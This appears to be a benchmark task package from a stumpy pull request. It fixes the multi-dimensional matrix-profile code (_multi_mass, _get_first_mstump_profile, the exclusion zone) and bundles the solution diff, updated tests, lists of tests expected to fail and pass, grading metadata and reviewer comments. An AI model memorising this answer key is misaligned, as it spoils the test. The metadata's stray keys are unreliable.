= D_prime + D[i] + D[i, :] = D_prime / (i + 1) - return P, I + return D def _get_first_mstump_profile(start, T, m, excl_zone, M_T, Σ_T): @@ -123,8 +98,22 @@ def _get_first_mstump_profile(start, T, m, excl_zone, M_T, Σ_T): equal to `start` """ - # Handle first subsequence, add exclusionary zone - P, I = _multi_mass(T[:, start : start + m], T, m, M_T, Σ_T, start, excl_zone) + d, n = T.shape + D = _multi_mass(T[:, start : start + m], T, m, M_T, Σ_T) + + zone_start = max(0, start - excl_zone) + zone_stop = min(n - m + 1, start + excl_zone) + D[:, zone_start : zone_stop + 1] = np.inf + + P = np.full(d, np.inf, dtype="float64") + I = np.ones(d, dtype="int64") * -1 + + for i in range(d): + min_index = np.argmin(D[i]) + I[i] = min_index + P[i] = D[i, min_index] + if np.isinf(P[i]): # pragma nocover + I[i] = -1 return P, I @@ -314,19 +303,18 @@ def _mstump( D = np.sqrt(D) # Column-wise sort - for col in range(k): - # row_idx[:, col] = np.argsort(D[:, col]) - # D[:, col] = D[row_idx[:, col], col] + for col in prange(k): D[:, col] = np.sort(D[:, col]) + D_prime[:] = 0.0 for i in range(d): D_prime = D_prime + D[i] - D_prime_prime = D_prime / (i + 1) - # Element-wise Min - for col in range(k): - if P[i, col] > D_prime_prime[col]: - P[i, col] = D_prime_prime[col] - I[i, col] = idx + + min_index = np.argmin(D_prime) + I[i, idx] = min_index + P[i, idx] = D_prime[min_index] / (i + 1) + if np.isinf(P[i, idx]): # pragma nocover + I[i, idx] = -1 return P, I @@ -354,12 +342,12 @@ def mstump(T, m): Returns ------- P : ndarray - The multi-dimensional matrix profile. Each row of the array corresponds - to each matrix profile for a given dimension (i.e., the first row is the - 1-D matrix profile and the second row is the 2-D matrix profile). + The multi-dimensional matrix profile. Each column of the array corresponds + to each matrix profile for a given dimension (i.e., the first column is + the 1-D matrix profile and the second column is the 2-D matrix profile). I : ndarray - The multi-dimensional matrix profile index where each row of the array + The multi-dimensional matrix profile index where each column of the array corresponds to each matrix profile index for a given dimension. Notes @@ -397,7 +385,9 @@ def mstump(T, m): start = 0 stop = k - P, I = _get_first_mstump_profile(start, T, m, excl_zone, M_T, Σ_T) + P[:, start], I[:, start] = _get_first_mstump_profile( + start, T, m, excl_zone, M_T, Σ_T + ) QT, QT_first = _get_multi_QT(start, T, m) diff --git a/stumpy/mstumped.py b/stumpy/mstumped.py index d578004..27a11b2 100644 --- a/stumpy/mstumped.py +++ b/stumpy/mstumped.py @@ -41,12 +41,12 @@ def mstumped(dask_client, T, m): Returns ------- P : ndarray - The multi-dimensional matrix profile. Each row of the array corresponds - to each matrix profile for a given dimension (i.e., the first row is the - 1-D matrix profile and the second row is the 2-D matrix profile). + The multi-dimensional matrix profile. Each column of the array corresponds + to each matrix profile for a given dimension (i.e., the first column is + the 1-D matrix profile and the second column is the 2-D matrix profile). I : ndarray - The multi-dimensional matrix profile index where each row of the array + The multi-dimensional matrix profile index where each column of the array corresponds to each matrix profile index for a given dimension. Notes @@ -79,7 +79,7 @@ def mstumped(dask_client, T, m): M_T, Σ_T = core.compute_mean_std(T, m) μ_Q, σ_Q = core.compute_mean_std(T, m) - P = np.empty((nworkers, d, k), dtype="float64") + P = np.full((nworkers, d, k), np.inf, dtype="float64") D = np.zeros((nworkers, d, k), dtype="float64") D_prime = np.zeros((nworkers, k), dtype="float64") I = np.ones((nworkers, d, k), dtype="int64") * -1 @@ -100,7 +100,9 @@ def mstumped(dask_client, T, m): D_prime_futures = [] for i, start in enumerate(range(0, k, step)): - P[i], I[i] = _get_first_mstump_profile(start, T, m, excl_zone, M_T, Σ_T) + P[i, :, start], I[i, :, start] = _get_first_mstump_profile( + start, T, m, excl_zone, M_T, Σ_T + ) P_future = dask_client.scatter(P[i], workers=[hosts[i]]) I_future = dask_client.scatter(I[i], workers=[hosts[i]])
Fixed Issue #136 and improved mstump tests I tried to stick as much to the issue #136 as I could, but I had to make some changes that touch issue #135 . - The main change is that I converted `_multi_mass` to return the multidimensional distance profile as discussed. - I also changed `_get_first_mstump_profile` in a way so that it only returns the profile values and indices at index `start` so that this function is consistent with `stump._get_first_stump_profile`. I made this change in this PR because I had to move things to this function, e.g. the application of an exclusion zone, and it made sense to do it here. This does break the anytime ability of mstump though (because the distance profile of `T[start:start+m]` does not influence the whole matrix profile anymore). This is why I had to slightly change the logic of `_mstump`. I tried to leave it as untouched as possible. Also minor changes to `mstumped` had to be made. - Some tests were improved to actually use the defined functions. I also moved the `naive_mstump` function to `utils.py` to be able to reuse it in `test_mstumped.py`. Let me know what you think.
**Title** Correct multi‑dimensional distance handling and first‑profile computation for MSTump **Problem** `mstump` produced an incorrect matrix profile because the first distance profile was computed over the entire series and the exclusion zone was applied inconsistently. This also caused a mismatch in how the profile dimensions were documented and initialized. **Root Cause** The multi‑dimensional MASS wrapper returned a full matrix profile and accepted parameters for exclusion‑zone handling that were mis‑used, while the first‑profile helper returned values for all positions instead of only the starting column. **Fix / Expected Behavior** - Refactor the multi‑dimensional MASS wrapper to return only the distance profile. - Apply the exclusion zone explicitly after the distance profile is computed. - Adjust the first‑profile helper to output a single column (profile values and indices at the given start). - Update the iterative update logic to maintain correct minima per dimension using the newly‑computed distance profile. - Align documentation and array shapes so that each column corresponds to a dimension’s matrix profile, and initialize profiles with `inf` where appropriate. **Risk & Validation** - The new sorting and exclusion‑zone steps could affect performance; benchmarks should verify no regressions. - Ensure the parallel `mstumped` implementation mirrors the corrected single‑process logic; run existing parallel tests. - Added/updated tests compare the output against a naive reference implementation across multiple dimensions and verify proper handling of the exclusion zone.
137
TDAmeritrade/stumpy
diff --git a/tests/test_mstump.py b/tests/test_mstump.py index abd69d1..e620f5d 100644 --- a/tests/test_mstump.py +++ b/tests/test_mstump.py @@ -13,37 +13,6 @@ import pytest import utils -def naive_mass(Q, T, m, trivial_idx, excl_zone): - D = np.linalg.norm( - utils.z_norm(core.rolling_window(T, m), 1) - utils.z_norm(Q), axis=1 - ) - start = max(0, trivial_idx - excl_zone) - stop = min(T.shape[0] - Q.shape[0] + 1, trivial_idx + excl_zone) - D[start : stop + 1] = np.inf - - return D - - -def naive_PI(D, trivial_idx): - P = np.full((D.shape[0], D.shape[1]), np.inf) - I = np.ones((D.shape[0], D.shape[1]), dtype="int64") * -1 - - D = np.sort(D, axis=0) - - D_prime = np.zeros(D.shape[1]) - for i in range(D.shape[0]): - D_prime = D_prime + D[i] - D_prime_prime = D_prime / (i + 1) - # Element-wise Min - # col_idx = np.argmin([left_P[i, :], D_prime_prime], axis=0) - # col_mask = col_idx > 0 - col_mask = P[i] > D_prime_prime - P[i, col_mask] = D_prime_prime[col_mask] - I[i, col_mask] = trivial_idx - - return P, I - - def naive_rolling_window_dot_product(Q, T): window = len(Q) result = np.zeros(len(T) - window + 1) @@ -52,29 +21,6 @@ def naive_rolling_window_dot_product(Q, T): return result -def naive_mstump(T, m): - zone = int(np.ceil(m / 4)) - Q = core.rolling_window(T, m) - D = np.empty((Q.shape[0], Q.shape[1])) - P = np.full((Q.shape[0], Q.shape[1]), np.inf) - I = np.ones((Q.shape[0], Q.shape[1]), dtype="int64") * -1 - - # Left - for i in range(Q.shape[1]): - D[:] = 0.0 - for dim in range(T.shape[0]): - D[dim] = naive_mass(Q[dim, i], T[dim], m, i, zone) - - P_i, I_i = naive_PI(D, i) - - for dim in range(T.shape[0]): - col_mask = P[dim] > P_i[dim] - P[dim, col_mask] = P_i[dim, col_mask] - I[dim, col_mask] = I_i[dim, col_mask] - - return P, I - - test_data = [ (np.array([[584, -11, 23, 79, 1001, 0, -19]], dtype=np.float64), 3), (np.random.uniform(-1000, 1000, [3, 10]).astype(np.float64), 5), @@ -83,48 +29,27 @@ test_data = [ @pytest.mark.parametrize("T, m", test_data) def test_multi_mass(T, m): - - excl_zone = int(np.ceil(m / 4)) trivial_idx = 2 - Q = core.rolling_window(T, m) - # left - D = np.empty((Q.shape[0], Q.shape[1])) - - for i in range(T.shape[0]): - D[i] = naive_mass(Q[i, 0], T[i], m, trivial_idx, excl_zone) + Q = T[:, trivial_idx : trivial_idx + m] - left_P, left_I = naive_PI(D, trivial_idx) + left = utils.naive_multi_mass(Q, T, m) - # right - M_T = np.empty((Q.shape[0], Q.shape[1])) - Σ_T = np.empty((Q.shape[0], Q.shape[1])) - for i in range(Q.shape[0]): - M_T[i] = np.mean(Q[i], axis=1) - Σ_T[i] = np.std(Q[i], axis=1) - right_P, right_I = _multi_mass(Q[:, 0], T, m, M_T, Σ_T, trivial_idx, excl_zone) + M_T, Σ_T = core.compute_mean_std(T, m) + right = _multi_mass(Q, T, m, M_T, Σ_T) - npt.assert_almost_equal(left_P, right_P) - npt.assert_equal(left_I, right_I) + npt.assert_almost_equal(left, right) @pytest.mark.parametrize("T, m", test_data) def test_get_first_mstump_profile(T, m): excl_zone = int(np.ceil(m / 4)) start = 0 - Q = core.rolling_window(T, m) - # left - D = np.empty((Q.shape[0], Q.shape[1])) - for i in range(T.shape[0]): - D[i] = naive_mass(Q[i, 0], T[i], m, start, excl_zone) - - left_P, left_I = naive_PI(D, start) - - # right - M_T = np.empty((Q.shape[0], Q.shape[1])) - Σ_T = np.empty((Q.shape[0], Q.shape[1])) - for i in range(Q.shape[0]): - M_T[i] = np.mean(Q[i], axis=1) - Σ_T[i] = np.std(Q[i], axis=1) + + left_P, left_I = utils.naive_mstump(T, m, excl_zone) + left_P = left_P[start, :] + left_I = left_I[start, :] + + M_T, Σ_T = core.compute_mean_std(T, m) right_P, right_I = _get_first_mstump_profile(start, T, m, excl_zone, M_T, Σ_T) npt.assert_almost_equal(left_P, right_P) @@ -150,49 +75,36 @@ def test_get_multi_QT(T, m): npt.assert_almost_equal(left_QT_first, right_QT_first) -@pytest.mark.parametrize("T, m", test_data) -def test_mstump(T, m): - left_P, left_I = naive_mstump(T, m) +def test_naive_mstump(): + T = np.random.uniform(-1000, 1000, [1, 1000]).astype(np.float64) + m = 20 - # Right - d = T.shape[0] - n = T.shape[1] - k = n - m + 1 - excl_zone = int(np.ceil(m / 4)) # See Definition 3 and Figure 3 + excl_zone = int(np.ceil(m / 4)) - M_T, Σ_T = core.compute_mean_std(T, m) - μ_Q, σ_Q = core.compute_mean_std(T, m) + left = np.array( + [ + utils.naive_mass( + Q, T[0], m, trivial_idx=i, ignore_trivial=True, excl_zone=excl_zone + ) + for i, Q in enumerate(core.rolling_window(T[0], m)) + ], + dtype=object, + ) + left_P = left[np.newaxis, :, 0].T + left_I = left[np.newaxis, :, 1].T - P = np.empty((d, k), dtype="float64") - D = np.zeros((d, k), dtype="float64") - D_prime = np.zeros(k, dtype="float64") - I = np.ones((d, k), dtype="int64") * -1 + right_P, right_I = utils.naive_mstump(T, m, excl_zone) - start = 0 - stop = k - - P, I = _get_first_mstump_profile(start, T, m, excl_zone, M_T, Σ_T) - - QT, QT_first = _get_multi_QT(start, T, m) - - right_P, right_I = _mstump( - T, - m, - P, - I, - D, - D_prime, - stop, - excl_zone, - M_T, - Σ_T, - QT, - QT_first, - μ_Q, - σ_Q, - k, - start + 1, - ) + npt.assert_almost_equal(left_P, right_P) + npt.assert_almost_equal(left_I, right_I) + + +@pytest.mark.parametrize("T, m", test_data) +def test_mstump(T, m): + excl_zone = int(np.ceil(m / 4)) + + left_P, left_I = utils.naive_mstump(T, m, excl_zone) + right_P, right_I = mstump(T, m) npt.assert_almost_equal(left_P, right_P) npt.assert_almost_equal(left_I, right_I) @@ -200,17 +112,19 @@ def test_mstump(T, m): @pytest.mark.parametrize("T, m", test_data) def test_mstump_wrapper(T, m): - left_P, left_I = naive_mstump(T, m) + excl_zone = int(np.ceil(m / 4)) + + left_P, left_I = utils.naive_mstump(T, m, excl_zone) right_P, right_I = mstump(T, m) - npt.assert_almost_equal(left_P.T, right_P) - npt.assert_almost_equal(left_I.T, right_I) + npt.assert_almost_equal(left_P, right_P) + npt.assert_almost_equal(left_I, right_I) df = pd.DataFrame(T.T) right_P, right_I = mstump(df, m) - npt.assert_almost_equal(left_P.T, right_P) - npt.assert_almost_equal(left_I.T, right_I) + npt.assert_almost_equal(left_P, right_P) + npt.assert_almost_equal(left_I, right_I) def test_constant_subsequence_self_join(): @@ -218,7 +132,9 @@ def test_constant_subsequence_self_join(): T = np.array([T_A, T_A, np.random.rand(T_A.shape[0])]) m = 3 - left_P, left_I = naive_mstump(T, m) + excl_zone = int(np.ceil(m / 4)) + + left_P, left_I = utils.naive_mstump(T, m, excl_zone) right_P, right_I = mstump(T, m) - npt.assert_almost_equal(left_P.T, right_P) # ignore indices + npt.assert_almost_equal(left_P, right_P) # ignore indices diff --git a/tests/test_mstumped.py b/tests/test_mstumped.py index 272c080..850a2da 100644 --- a/tests/test_mstumped.py +++ b/tests/test_mstumped.py @@ -18,60 +18,6 @@ def dask_client(): cluster.close() -def naive_mass(Q, T, m, trivial_idx, excl_zone): - D = np.linalg.norm( - utils.z_norm(core.rolling_window(T, m), 1) - utils.z_norm(Q), axis=1 - ) - start = max(0, trivial_idx - excl_zone) - stop = min(T.shape[0] - Q.shape[0] + 1, trivial_idx + excl_zone) - D[start : stop + 1] = np.inf - - return D - - -def naive_PI(D, trivial_idx): - P = np.full((D.shape[0], D.shape[1]), np.inf) - I = np.ones((D.shape[0], D.shape[1]), dtype="int64") * -1 - - D = np.sort(D, axis=0) - - D_prime = np.zeros(D.shape[1]) - for i in range(D.shape[0]): - D_prime = D_prime + D[i] - D_prime_prime = D_prime / (i + 1) - # Element-wise Min - # col_idx = np.argmin([left_P[i, :], D_prime_prime], axis=0) - # col_mask = col_idx > 0 - col_mask = P[i] > D_prime_prime - P[i, col_mask] = D_prime_prime[col_mask] - I[i, col_mask] = trivial_idx - - return P, I - - -def naive_mstump(T, m): - zone = int(np.ceil(m / 4)) - Q = core.rolling_window(T, m) - D = np.empty((Q.shape[0], Q.shape[1])) - P = np.full((Q.shape[0], Q.shape[1]), np.inf) - I = np.ones((Q.shape[0], Q.shape[1]), dtype="int64") * -1 - - # Left - for i in range(Q.shape[1]): - D[:] = 0.0 - for dim in range(T.shape[0]): - D[dim] = naive_mass(Q[dim, i], T[dim], m, i, zone) - - P_i, I_i = naive_PI(D, i) - - for dim in range(T.shape[0]): - col_mask = P[dim] > P_i[dim] - P[dim, col_mask] = P_i[dim, col_mask] - I[dim, col_mask] = I_i[dim, col_mask] - - return P, I - - test_data = [ (np.array([[584, -11, 23, 79, 1001, 0, -19]], dtype=np.float64), 3), (np.random.uniform(-1000, 1000, [3, 10]).astype(np.float64), 5), @@ -81,22 +27,26 @@ test_data = [ @pytest.mark.filterwarnings("ignore:\\s+Port 8787 is already in use:UserWarning") @pytest.mark.parametrize("T, m", test_data) def test_mstumped(T, m, dask_client): - left_P, left_I = naive_mstump(T, m) + excl_zone = int(np.ceil(m / 4)) + + left_P, left_I = utils.naive_mstump(T, m, excl_zone) right_P, right_I = mstumped(dask_client, T, m) - npt.assert_almost_equal(left_P.T, right_P) - npt.assert_almost_equal(left_I.T, right_I) + npt.assert_almost_equal(left_P, right_P) + npt.assert_almost_equal(left_I, right_I) @pytest.mark.filterwarnings("ignore:\\s+Port 8787 is already in use:UserWarning") @pytest.mark.parametrize("T, m", test_data) def test_mstumped_df(T, m, dask_client): - left_P, left_I = naive_mstump(T, m) + excl_zone = int(np.ceil(m / 4)) + + left_P, left_I = utils.naive_mstump(T, m, excl_zone) df = pd.DataFrame(T.T) right_P, right_I = mstumped(dask_client, df, m) - npt.assert_almost_equal(left_P.T, right_P) - npt.assert_almost_equal(left_I.T, right_I) + npt.assert_almost_equal(left_P, right_P) + npt.assert_almost_equal(left_I, right_I) @pytest.mark.filterwarnings("ignore:\\s+Port 8787 is already in use:UserWarning") @@ -105,7 +55,9 @@ def test_constant_subsequence_self_join(dask_client): T = np.array([T_A, T_A, np.random.rand(T_A.shape[0])]) m = 3 - left_P, left_I = naive_mstump(T, m) + excl_zone = int(np.ceil(m / 4)) + + left_P, left_I = utils.naive_mstump(T, m, excl_zone) right_P, right_I = mstumped(dask_client, T, m) - npt.assert_almost_equal(left_P.T, right_P) # ignore indices + npt.assert_almost_equal(left_P, right_P) # ignore indices diff --git a/tests/utils.py b/tests/utils.py index 9cba7cc..862c946 100644 --- a/tests/utils.py +++ b/tests/utils.py @@ -58,3 +58,62 @@ def replace_inf(x, value=0): x[x == np.inf] = value x[x == -np.inf] = value return + + +def naive_multi_mass(Q, T, m): + d, n = T.shape + + D = np.empty((d, n - m + 1)) + for i in range(d): + D[i] = np.linalg.norm( + z_norm(core.rolling_window(T[i], m), 1) - z_norm(Q[i]), axis=1 + ) + + D = np.sort(D, axis=0) + + D_prime = np.zeros(n - m + 1) + D_prime_prime = np.zeros((d, n - m + 1)) + for i in range(d): + D_prime[:] = D_prime + D[i] + D_prime_prime[i, :] = D_prime / (i + 1) + + return D_prime_prime + + +def naive_PI(D, trivial_idx, excl_zone): + d, k = D.shape + + P = np.full((d, k), np.inf) + I = np.ones((d, k), dtype="int64") * -1 + + zone_start = max(0, trivial_idx - excl_zone) + zone_end = min(k, trivial_idx + excl_zone) + D[:, zone_start : zone_end + 1] = np.inf + + for i in range(d): + col_mask = P[i] > D[i] + P[i, col_mask] = D[i, col_mask] + I[i, col_mask] = trivial_idx + + return P, I + + +def naive_mstump(T, m, excl_zone): + d, n = T.shape + k = n - m + 1 + + P = np.full((d, k), np.inf) + I = np.ones((d, k), dtype="int64") * -1 + + for i in range(k): + Q = T[:, i : i + m] + D = naive_multi_mass(Q, T, m) + + P_i, I_i = naive_PI(D, i, excl_zone) + + for dim in range(T.shape[0]): + col_mask = P[dim] > P_i[dim] + P[dim, col_mask] = P_i[dim, col_mask] + I[dim, col_mask] = I_i[dim, col_mask] + + return P.T, I.T
[ "tests/test_mstump.py::test_multi_mass[T0-3]", "tests/test_mstump.py::test_multi_mass[T1-5]", "tests/test_mstump.py::test_get_first_mstump_profile[T0-3]", "tests/test_mstump.py::test_get_first_mstump_profile[T1-5]" ]
[ "tests/test_mstump.py::test_get_multi_QT[T0-3]", "tests/test_mstump.py::test_get_multi_QT[T1-5]", "tests/test_mstump.py::test_naive_mstump", "tests/test_mstump.py::test_mstump[T0-3]", "tests/test_mstump.py::test_mstump[T1-5]", "tests/test_mstump.py::test_mstump_wrapper[T0-3]", "tests/test_mstump.py::test_mstump_wrapper[T1-5]", "tests/test_mstump.py::test_constant_subsequence_self_join", "tests/test_mstumped.py::test_mstumped[T0-3]", "tests/test_mstumped.py::test_mstumped[T1-5]", "tests/test_mstumped.py::test_mstumped_df[T0-3]", "tests/test_mstumped.py::test_mstumped_df[T1-5]", "tests/test_mstumped.py::test_constant_subsequence_self_join" ]
Function: _multi_mass(Q, T, m, M_T, Σ_T) Location: stumpy/mstump.py Inputs: - Q: ndarray of shape (d, m) – the query subsequence (across d dimensions). - T: ndarray of shape (d, n) – the multidimensional time series. - m: int – subsequence length. - M_T: ndarray of shape (d, k) – sliding means of T for each dimension (`k = n‑m+1`). - Σ_T: ndarray of shape (d, k) – sliding standard deviations of T for each dimension. Outputs: - D: ndarray of shape (d, k) – the multi‑dimensional distance profile (sorted column‑wise) for the query Q against T. Description: Computes MASS‑based distance profiles for each dimension, stacks them, sorts each column, and then cumulatively averages to obtain the multi‑dimensional distance profile. The previous version also required `trivial_idx` and `excl_zone`; those arguments have been removed, and exclusion‑zone handling is now performed by the caller. Function: _get_first_mstump_profile(start, T, m, excl_zone, M_T, Σ_T) Location: stumpy/mstump.py Inputs: - start: int – index of the first subsequence to process. - T: ndarray of shape (d, n) – the multidimensional time series. - m: int – subsequence length. - excl_zone: int – half‑width of the exclusion zone around `start`. - M_T: ndarray of shape (d, k) – sliding means of T. - Σ_T: ndarray of shape (d, k) – sliding standard deviations of T. Outputs: - P: ndarray of shape (d,) – the multi‑dimensional matrix‑profile values for the subsequence starting at `start` (one value per dimension). - I: ndarray of shape (d,) – the corresponding matrix‑profile index for each dimension (‑1 if the value is infinite). Description: Retrieves the distance profile for the subsequence `T[:, start:start+m]` via `_multi_mass`, applies the exclusion zone, then for each dimension selects the minimum distance and its index. Unlike the previous implementation which returned full profile matrices, it now returns only the profile values and indices for the specified `start` position, matching the updated test expectations.
custom-check-github
{ "base_image_name": "python_base_310", "install": [ "pip install -q -e .", "pip install -q pytest pandas dask distributed coverage flake8 black" ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/test_mstump.py tests/test_mstumped.py tests/utils.py" }
{ "num_modified_files": 2, "num_modified_lines": 47, "pr_author": "mexxexx", "pr_labels": [], "llm_metadata": { "code": "B4", "code_quality": null, "confidence": 0.78, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": true, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "partial", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue describes a set of code changes (converting _multi_mass, adjusting _get_first_mstump_profile, moving naive implementations) and corresponding test updates, but it does not pose a clear, actionable problem statement or acceptance criteria; it reads like a commit message rather than a well‑specified task. The provided tests are consistent with the described changes, so there is no mismatch between test expectations and the described behavior. The primary problem is the ambiguous specification of what remains to be done, which matches B4 (AMBIGUOUS_SPEC).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
f0ab95d89309aa5ec5da946f0f46e8563ffd0ebf
2020-05-24 16:04:32
codecov-commenter: # [Codecov](https://codecov.io/gh/TDAmeritrade/stumpy/pull/183?src=pr&el=h1) Report > Merging [#183](https://codecov.io/gh/TDAmeritrade/stumpy/pull/183?src=pr&el=desc) into [master](https://codecov.io/gh/TDAmeritrade/stumpy/commit/f8cd8fbd40df3b0d748d2cf394e6a48f6d581fb6&el=desc) will **not change** coverage. > The diff coverage is `100.00%`. [![Impacted file tree graph](https://codecov.io/gh/TDAmeritrade/stumpy/pull/183/graphs/tree.svg?width=650&height=150&src=pr&token=u0DooAbGji)](https://codecov.io/gh/TDAmeritrade/stumpy/pull/183?src=pr&el=tree) ```diff @@ Coverage Diff @@ ## master #183 +/- ## ========================================= Coverage 100.00% 100.00% ========================================= Files 13 13 Lines 1058 1025 -33 ========================================= - Hits 1058 1025 -33 ``` | [Impacted Files](https://codecov.io/gh/TDAmeritrade/stumpy/pull/183?src=pr&el=tree) | Coverage Δ | | |---|---|---| | [stumpy/core.py](https://codecov.io/gh/TDAmeritrade/stumpy/pull/183/diff?src=pr&el=tree#diff-c3R1bXB5L2NvcmUucHk=) | `100.00% <100.00%> (ø)` | | | [stumpy/gpu\_stump.py](https://codecov.io/gh/TDAmeritrade/stumpy/pull/183/diff?src=pr&el=tree#diff-c3R1bXB5L2dwdV9zdHVtcC5weQ==) | `100.00% <100.00%> (ø)` | | | [stumpy/stamp.py](https://codecov.io/gh/TDAmeritrade/stumpy/pull/183/diff?src=pr&el=tree#diff-c3R1bXB5L3N0YW1wLnB5) | `100.00% <100.00%> (ø)` | | | [stumpy/stomp.py](https://codecov.io/gh/TDAmeritrade/stumpy/pull/183/diff?src=pr&el=tree#diff-c3R1bXB5L3N0b21wLnB5) | `100.00% <100.00%> (ø)` | | | [stumpy/stump.py](https://codecov.io/gh/TDAmeritrade/stumpy/pull/183/diff?src=pr&el=tree#diff-c3R1bXB5L3N0dW1wLnB5) | `100.00% <100.00%> (ø)` | | | [stumpy/stumped.py](https://codecov.io/gh/TDAmeritrade/stumpy/pull/183/diff?src=pr&el=tree#diff-c3R1bXB5L3N0dW1wZWQucHk=) | `100.00% <100.00%> (ø)` | | | [stumpy/mstump.py](https://codecov.io/gh/TDAmeritrade/stumpy/pull/183/diff?src=pr&el=tree#diff-c3R1bXB5L21zdHVtcC5weQ==) | `100.00% <0.00%> (ø)` | | | [stumpy/scrump.py](https://codecov.io/gh/TDAmeritrade/stumpy/pull/183/diff?src=pr&el=tree#diff-c3R1bXB5L3NjcnVtcC5weQ==) | `100.00% <0.00%> (ø)` | | ------ [Continue to review full report at Codecov](https://codecov.io/gh/TDAmeritrade/stumpy/pull/183?src=pr&el=continue). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? = missing data` > Powered by [Codecov](https://codecov.io/gh/TDAmeritrade/stumpy/pull/183?src=pr&el=footer). Last update [f8cd8fb...449c749](https://codecov.io/gh/TDAmeritrade/stumpy/pull/183?src=pr&el=lastupdated). Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments). mexxexx: I honestly just forgot about scrump, there it will definitely be possible (although the exclusion zone is not necessary). For mstump I'll have to see, but it might work. I didn't move the `check_dtype` stuff inside, because I thought it doesn't belong there. As for the naive mean/std don't you think it's even more naive this way? Computing it in a rolling manner for each subsequence? seanlaw: > I honestly just forgot about scrump, there it will definitely be possible (although the exclusion zone is not necessary). For mstump I'll have to see, but it might work. Cool! If you can see if you can add this to `mstump`, `mstumped` then that would be great! Let's leave `scrump` out of it since I'm doing some work on it right now and we can deal with it afterward. > I didn't move the check_dtype stuff inside, because I thought it doesn't belong there. That's fair. It's more of a "check" and not really changing anything. > As for the naive mean/std don't you think it's even more naive this way? Computing it in a rolling manner for each subsequence? Okay, I see it now. I didn't realize when I first looked at it. I take back my "concern" 👍 mexxexx: How would you like to rename the function? seanlaw: > How would you like to rename the function? I don’t know 🤷‍♂️ So, I say let’s be pragmatic and we just go with `preprocess` for now and adjust it later if needed mexxexx: Okay :smile: I included the preprocessing in MSTUMP/MSTUMPED and had to make small changes. seanlaw: @mexxexx It looks like `apply_exclusion_zone` is already `njit`. Can we use this in `mstump` and `mstumped`? I think that if we updated `_get_first_mstump_profile` and `_compute_multi_D` to use `apply_exclusion_zone` then we should be good. mexxexx: I think we need a different function for `mstump`, because we have one extra dimension there. ``` D[:, zone_start : zone_stop + 1] ``` in `mstump` vs ``` D[zone_start : zone_stop + 1] ``` in the 1D case. seanlaw: According to [this](https://stackoverflow.com/questions/42916029/numpy-indexing-over-the-last-axis-when-you-dont-know-the-rank-in-advance), I think it would be fine to do: ``` zone_start = max(0, idx - excl_zone) zone_stop = min(D.shape[0], idx + excl_zone) D[..., zone_start : zone_stop + 1] = np.inf ``` mexxexx: Ah cool, I didn't know, thanks! I'll try it out tomorrow. seanlaw: @mexxexx Everything looks good. Do you think you could also rename `stamp.mass` to `stamp.mass_PI`? Then maybe we can close issue #166?
tdameritrade__stumpy-183
diff --git a/stumpy/core.py b/stumpy/core.py index 24e1ffe..a32ed64 100644 --- a/stumpy/core.py +++ b/stumpy/core.py @@ -663,17 +663,81 @@ def mass(Q, T, M_T=None, Σ_T=None): if np.any(np.isnan(Q)): distance_profile[:] = np.inf else: + if M_T is None or Σ_T is None: + T, M_T, Σ_T = preprocess(T, m) + QT = sliding_dot_product(Q, T) μ_Q, σ_Q = compute_mean_std(Q, m) μ_Q = μ_Q[0] σ_Q = σ_Q[0] - if M_T is None or Σ_T is None: - M_T, Σ_T = compute_mean_std(T, m) distance_profile[:] = _mass(Q, T, QT, μ_Q, σ_Q, M_T, Σ_T) return distance_profile +@njit(fastmath=True) +def apply_exclusion_zone(D, idx, excl_zone): + """ + Apply an exclusion zone to an array (inplace), i.e. set all values + to np.inf in a window around a given index. + + All values in D in [idx - excl_zone, idx + excl_zone] (endpoints included) + will be set to np.inf. + + Parameters + ---------- + D : ndarray + The array you want to apply the exclusion zone to + + idx : int + The index around which the window should be centered + + excl_zone : int + Size of the exclusion zone. + """ + + zone_start = max(0, idx - excl_zone) + zone_stop = min(D.shape[-1], idx + excl_zone) + D[..., zone_start : zone_stop + 1] = np.inf + + +def preprocess(T, m): + """ + Creates a copy of the time series where all NaN and inf values + are replaced with zero. Also computes mean and standard deviation + for every subsequence. Every subsequence that contains at least + one NaN or inf value, will have a mean of np.inf. For the standard + deviation these values are ignored. If all values are illegal, the + standard deviation will be 0 (see `core.compute_mean_std`) + + Parameters + ---------- + T : ndarray + Time series or sequence + + m : int + Window size + + Returns + ------- + T : ndarray + Modified time series + M_T : ndarray + Rolling mean + Σ_T : ndarray + Rolling standard deviation + """ + + T = T.copy() + T = np.asarray(T) + + T[np.isinf(T)] = np.nan + M_T, Σ_T = compute_mean_std(T, m) + T[np.isnan(T)] = 0 + + return T, M_T, Σ_T + + def array_to_temp_file(a): """ Write an ndarray to a file diff --git a/stumpy/gpu_stump.py b/stumpy/gpu_stump.py index 1b32458..08601c7 100644 --- a/stumpy/gpu_stump.py +++ b/stumpy/gpu_stump.py @@ -437,30 +437,32 @@ def gpu_stump(T_A, m, T_B=None, ignore_trivial=True, device_id=0): Note that left and right matrix profiles are only available for self-joins. """ - T_A = np.asarray(T_A) + if T_B is None: # Self join! + T_B = T_A + ignore_trivial = True + + # Swap T_A and T_B for GPU implementation + # This keeps the API identical to and compatible with `stumpy.stump` + tmp_T = T_A + T_A = T_B + T_B = 